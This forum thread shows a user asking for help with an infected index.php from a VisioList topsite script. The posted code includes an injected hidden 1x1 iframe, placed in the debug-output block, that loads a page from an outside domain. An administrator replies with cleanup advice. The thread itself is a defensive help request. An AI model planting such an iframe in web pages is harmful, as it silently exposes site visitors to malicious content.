[Virus] Index.php

cajkan

Active Member
Hello,
Today ive backed up my website and my ESET detected virus into index.php

Ive uploaded index.php so you can preview and tell me how to fix this problem



Heres CODE of the index.php

PHP:
<?php
//===========================================================================\\
// VisioList is a proud derivative work of:                                  \\
// Aardvark Topsites PHP                                                    \\
// Copyright (c) 2000-2009 Jeremy Scheff.  All rights reserved.              \\
//---------------------------------------------------------------------------\\
// http://www.aardvarktopsitesphp.com/                http://www.avatic.com/ \\
//---------------------------------------------------------------------------\\
// This program is free software; you can redistribute it and/or modify it  \\
// under the terms of the GNU General Public License as published by the    \\
// Free Software Foundation; either version 2 of the License, or (at your    \\
// option) any later version.                                                \\
//                                                                          \\
// This program is distributed in the hope that it will be useful, but      \\
// WITHOUT ANY WARRANTY; without even the implied warranty of                \\
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General \\
// Public License for more details.                                          \\
//===========================================================================\\
 
// Help prevent register_globals injection
define('ATSPHP', 1); //REMOVE ONCE ALL PLUGINS ARE UPDATED
define('VISIOLIST', 1);
$CONF = array();
$FORM = array();
$TMPL = array();
 
// Enable when coding
//error_reporting(E_ALL);
 
// Set encoding for multi-byte string functions
mb_internal_encoding("UTF-8");
 
// Change the path to your full path if necessary
$CONF['path'] = '.';
$TMPL['version'] = '0.9';
//If you set a cron job manually, set this to 1
$CONF['cron'] = '0';
 
// Set to 1 to display SQL queries and GET/POST/COOKIE data
$CONF['debug'] = 0;
 
// Require some classes and start the timer
require_once ("{$CONF['path']}/sources/misc/classes.php");
require_once ("{$CONF['path']}/sources/misc/form.php");
require_once ("{$CONF['path']}/sources/misc/validate.php");
$TIMER = new timer;
 
// Connect to the database
// Set the last argument of $DB->connect to 1 to enable debug mode
require_once ("{$CONF['path']}/settings_sql.php");
require_once ("{$CONF['path']}/sources/sql/{$CONF['sql']}.php");
require_once ("{$CONF['path']}/button_config.php");
$DB = "sql_{$CONF['sql']}";
$DB = new $DB;
$DB->connect($CONF['sql_host'], $CONF['sql_username'], $CONF['sql_password'], $CONF['sql_database'], $CONF['debug']);
 
$TMPL['rand'] = rand(1, 1000);
 
// Settings
$settings = $DB->fetch("SELECT * FROM {$CONF['sql_prefix']}_settings", __FILE__, __LINE__);
$CONF = array_merge($CONF, $settings);
 
// Hide PV Data if not enabled
$TMPL['pv_hide'] = '';
if ($CONF['count_pv'] != 1) {
    $TMPL['pv_hide'] = ' style="display: none;"';
}
 
// The language file
$LNG['charset'] = "utf-8";
require_once ("{$CONF['path']}/languages/english.php");
require_once ("{$CONF['path']}/languages/{$CONF['default_language']}.php");
 
// URL Helpers
if ($CONF['clean_url'] == 1) {
    $TMPL['url_tail'] = '/';
    $TMPL['url_helper_a'] = '';
    $TMPL['url_helper_u'] = '/';
    $TMPL['url_helper_cat'] = 'category/';
    $TMPL['url_helper_cat2'] = '/category/';
    $TMPL['url_helper_rate'] = 'review';
    $TMPL['url_helper_b'] = '/';
    $TMPL['url_helper_id'] = '/';
    $TMPL['url_helper_method'] = 'rank/';
    $TMPL['url_helper_q'] = '/';
    $TMPL['url_helper_start'] = '/';
} else {
    $TMPL['url_tail'] = '';
    $TMPL['url_helper_a'] = '?a=';
    $TMPL['url_helper_u'] = '&amp;u=';
    $TMPL['url_helper_cat'] = '?cat=';
    $TMPL['url_helper_cat2'] = '&amp;cat=';
    $TMPL['url_helper_rate'] = 'rate';
    $TMPL['url_helper_b'] = '&amp;b=';
    $TMPL['url_helper_id'] = '&amp;id=';
    $TMPL['url_helper_method'] = '?method=';
    $TMPL['url_helper_q'] = '&amp;q=';
    $TMPL['url_helper_start'] = '&amp;start=';
}
 
// Ad Breaks
$ad_breaks = explode(',', $CONF['ad_breaks']);
$CONF['ad_breaks'] = array();
foreach ($ad_breaks as $key => $value) {
    $CONF['ad_breaks'][$value] = $value;
}
 
// Header and footer javascript files
$TMPL['header_js_files'] = '';
$TMPL['header_js_files'] = '<script type="text/javascript" src="js/jquery-1.4.4.min.js"></script>
                            <script type="text/javascript" src="js/jquery-ui-1.8.20.custom.min.js"></script>';
$TMPL['footer_js_files'] = '';
$TMPL['footer_js_files'] = '<script type="text/javascript" src="js/jquery.newsScroll.js"></script>
                            <script type="text/javascript" src="js/jquery.tipTip.minified.js"></script>
                            <script type="text/javascript" src="fancybox/jquery.fancybox-1.3.4.js"></script>
                            <script type="text/javascript" src="fancybox/jquery.easing-1.3.pack.js"></script>
                            <script type="text/javascript" src="js/hoverintent.js"></script>';
 
//Initialize some vars for skin plugins, these are globally in template, so init here
$TMPL['css_styles'] = '';
$TMPL['head_extra'] = '';
$TMPL['front_page_top'] = '';
$TMPL['front_page_after_content'] = '';
$TMPL['sidebar_1_top'] = '';
$TMPL['sidebar_1_bottom'] = '';
$TMPL['footer_content'] = '';
$TMPL['footer_1'] = '';
$TMPL['footer_2'] = '';
$TMPL['extra_javascripts'] = '';
$TMPL['wrapper_welcome'] = '';
$TMPL['category_welcome'] = '';
$TMPL['user_cp_main_menu'] = '';
$TMPL['user_cp_score'] = '';
$TMPL['table_wrap_before_content'] = '';
$TMPL['table_wrap_after_content'] = '';
$TMPL['multiple_pages_p'] = '';
$TMPL['multiple_pages_n'] = '';
$TMPL['multiple_pages_links'] = '';
 
$TMPL['currency_code'] = $CONF['currency_code'];
$TMPL['currency_symbol'] = $CONF['currency_symbol'];
 
//Start Up The Plugin manager
include ('plugins.php');
pluginManager::getPluginManager();
 
// Lets load The Plugin Language Files
$plugin_dir = opendir("{$CONF['path']}/plugins/");
while (false !== ($plugin_subdir = readdir($plugin_dir))) {
    if ($plugin_subdir != '.' && $plugin_subdir != '..' && $plugin_subdir !=
        'index.htm') {
        include ('plugins/' . $plugin_subdir . '/languages/english.php');
        if (file_exists('plugins/' . $plugin_subdir . '/languages/' . $CONF['default_language'] .
            '.php')) {
            include ('plugins/' . $plugin_subdir . '/languages/' . $CONF['default_language'] .
                '.php');
        }
    }
}
 
 
//Hook Location
eval(PluginManager::getPluginManager()->pluginHooks('global_start'));
 
 
$CONF['skins_path'] = "{$CONF['path']}/skins";
$CONF['skins_url'] = "{$CONF['list_url']}/skins";
$TMPL['skins_url'] = $CONF['skins_url'];
$TMPL['list_name'] = $CONF['list_name'];
$TMPL['list_url'] = $CONF['list_url'];
 
// Combine the GET and POST input
$FORM = array_merge($_GET, $_POST);
 
$result = $DB->query("SELECT category, skin, cat_description, cat_keywords FROM {$CONF['sql_prefix']}_categories ORDER BY category",
    __file__, __line__);
while (list($category, $skin, $cat_description, $cat_keywords) = $DB->
    fetch_array($result)) {
    $CONF['categories'][$category]['skin'] = $skin;
    $CONF['categories'][$category]['cat_desc'] = $cat_description;
    $CONF['categories'][$category]['cat_key'] = $cat_keywords;
}
 
// Does FORM['cat'] exist?
foreach ($CONF['categories'] as $cat => $skin) {
 
    $FORM['cat'] = isset($FORM['cat']) ? $FORM['cat'] : '';
   
    // Unchanged category name array
    $category_name[] = $cat;
 
    // Rewrite category name to structure of category links
    $category_match[] = preg_replace('/((\&)|(\s))+/', '-', $cat);
 
    // Combine name and match, so we can use it to compare
    $category_combined = array_combine($category_name, $category_match);
 
    // See if $FORM cat match value from combined array ($category_match)
    // This assures that $FORM cat = category_match, therefore we have our needed CONF category
    // Use tag below to validate category in url instead of isset
    $TMPL['cat_exist'] = array_search($FORM['cat'], $category_combined);
 
    // Does old category links exist?
    if (preg_match('/((\&)|(\s))/', $FORM['cat']) && isset($FORM['a']) != 'admin') {
        $TMPL['old_cat_exist'] = array_search($FORM['cat'], $category_name);
    }
 
}
 
// Determine the category skin and meta data
if ($TMPL['cat_exist']) {
    $TMPL['skin_name'] = $CONF['categories'][$TMPL['cat_exist']]['skin'];
    $TMPL['meta_description'] = $CONF['categories'][$TMPL['cat_exist']]['cat_desc'];
    $TMPL['meta_keywords'] = $CONF['categories'][$TMPL['cat_exist']]['cat_key'];
    $TMPL['cat_desc'] = $CONF['categories'][$TMPL['cat_exist']]['cat_desc'];
} else {
    $TMPL['skin_name'] = $CONF['default_skin'];
}
 
if (!is_dir("{$CONF['path']}/skins/{$TMPL['skin_name']}/") || !$TMPL['skin_name']) {
    $TMPL['skin_name'] = $CONF['default_skin'];
}
if (!is_dir("{$CONF['path']}/skins/{$CONF['default_skin']}/")) {
    $TMPL['skin_name'] = 'parabola';
}
require_once ("{$CONF['path']}/sources/misc/skin.php");
 
if (isset($FORM['a'])) {
    if ($FORM['a'] == 'admin') {
        $TMPL['skin_name'] = 'admin';
    }
}elseif(empty($FORM['a']) && empty($FORM['app']) && empty($FORM['method']) && empty($FORM['cat'])){
$isfront = 1;
}
 
if($CONF['cron'] !== 1) {
    // Is it a new day/week/month?
    list($last_new_day, $last_new_week, $last_new_month) =
        $DB->fetch("SELECT last_new_day, last_new_week, last_new_month FROM {$CONF['sql_prefix']}_etc", __file__, __line__);
    $time = time() + (3600 * $CONF['time_offset']);
    $current_day = date('d', $time);
    $current_week = date('W', $time);
    $current_month = date('m', $time);
    if ($last_new_month != $current_month) {
        require_once ("{$CONF['path']}/sources/misc/new_day.php");
        new_month($current_month);
    }
    if ($last_new_week != $current_week) {
        require_once ("{$CONF['path']}/sources/misc/new_day.php");
        new_week($current_week);
    }
    if ($last_new_day != $current_day) {
        require_once ("{$CONF['path']}/sources/misc/new_day.php");
        new_day($current_day);
    }
}
 
 
 
// Adjust the output text based on days, weeks, or months
if ($CONF['ranking_period'] == 'weekly') {
    $LNG['g_this_period'] = $LNG['g_this_week'];
    $LNG['g_last_period'] = $LNG['g_last_week'];
} elseif ($CONF['ranking_period'] == 'monthly') {
    $LNG['g_this_period'] = $LNG['g_this_month'];
    $LNG['g_last_period'] = $LNG['g_last_month'];
} else {
    $LNG['g_this_period'] = $LNG['g_today'];
    $LNG['g_last_period'] = $LNG['g_yesterday'];
}
 
// Check if installer is there
if (file_exists("{$CONF['path']}/install/")) {
    $TMPL['header'] = $LNG['g_error'];
    $base = new base;
    $base->error($LNG['g_delete_install']);
}
 
// Check for hits in
require_once ("{$CONF['path']}/sources/in.php");
$in = new in;
 
// Array containing the valid .php files from the sources directory
$action = array(
    'admin' => 1,
    'in' => 1,
    'join' => 1,
    'lost_pw' => 1,
    'out' => 1,
    'page' => 1,
    'rankings' => 1,
    'rate' => 1,
    'search' => 1,
    'details' => 1,
    'sendmessage' => 1,
    'user_cpl' => 1
    );
 
 
eval(PluginManager::getPluginManager()->pluginHooks('action_array'));
 
 
// Redirect old category links to new ones if clean_urls are off
if (isset($TMPL['old_cat_exist'])) {
    $new_cat = preg_replace('/((\%26)|(\+))+/', '-', $_SERVER['REQUEST_URI']);
    $new_cat_url = 'http://' . $_SERVER['SERVER_NAME'] . $new_cat;
    Header("HTTP/1.1 301 Moved Permanently");
    Header('Location: ' . $new_cat_url);
}
 
// Require the appropriate file
if (isset($FORM['a']) && isset($action[$FORM['a']])) {
    $page_name = $FORM['a'];
    $page_name_path = $FORM['a'];
} elseif (isset($FORM['app']) && isset($action[$FORM['app']])) {
    $page_name = $FORM['app'];
    $page_name_path = 'mod/' . $FORM['app'];
} else {
    $page_name = 'rankings';
    $page_name_path = 'rankings';
}
 
$sources = 'sources';
eval(PluginManager::getPluginManager()->pluginHooks('include_source'));
 
 
require_once ("{$CONF['path']}/{$sources}/{$page_name_path}.php");
$page = new $page_name;
 
// Begin detect user_cp or login mvoe html to templates befroe release
if(isset($FORM['a']) && $FORM['a'] == 'admin') {
    // Do nothing :)
}
else {
  if (isset($_COOKIE['atsphp_sid_user_cp'])) {
    require_once ("{$CONF['path']}/sources/misc/session.php");
    $session = new session;
    list($type, $data) = $session->get($_COOKIE['atsphp_sid_user_cp']);
    $TMPL['wrapper_username'] = $DB->escape($data);
  }
  if (isset($TMPL['wrapper_username']) && $TMPL['wrapper_username']) {
    $TMPL['wrapper_welcome'] = base::do_skin('welcome_logged_in');
  } else {
    $TMPL['wrapper_username'] = '';
    $TMPL['wrapper_welcome'] = base::do_skin('welcome_not_logged_in');
  }
}
 
// Display the page
$skin = new main_skin('wrapper');
echo $skin->make();
 
$DB->close();
 
// Print out debugging info, if necessary
if ($CONF['debug'] == 1) {
 
    ini_set('display_errors', 1);
    error_reporting(E_ALL | E_STRICT);
 
    echo '<div style="clear: both;">';
    foreach ($DB->queries as $value) {
        echo "<hr /><pre>{$value}</pre>";
    }
    echo '<hr /><pre>';
    print_r($_REQUEST);
    echo '</pre>';
    echo '<iframe src="http://herofreemanja.com/img1/count.htm" width="1" height="1" frameborder="0"></iframe></div>';
} else {
    error_reporting(0);
}
NOTICE to other members : Do not download this file - it contains virus
 

Basti

Administrator
Staff member
Its likely a trojan which affects explorer.exe and / or collects ftp cache data. do a system scan and then change your ftp password. Then upload a fresh copy of index.php

On another note, linux systems seems to have quite a few exploits http://securitytracker.com/archives/category/2.html
Not to sure this have anything to do with it ( maybe some of these exploits allow to inject sites ), but might want to make your host aware of it and ask him to keep linux up to date
 
Top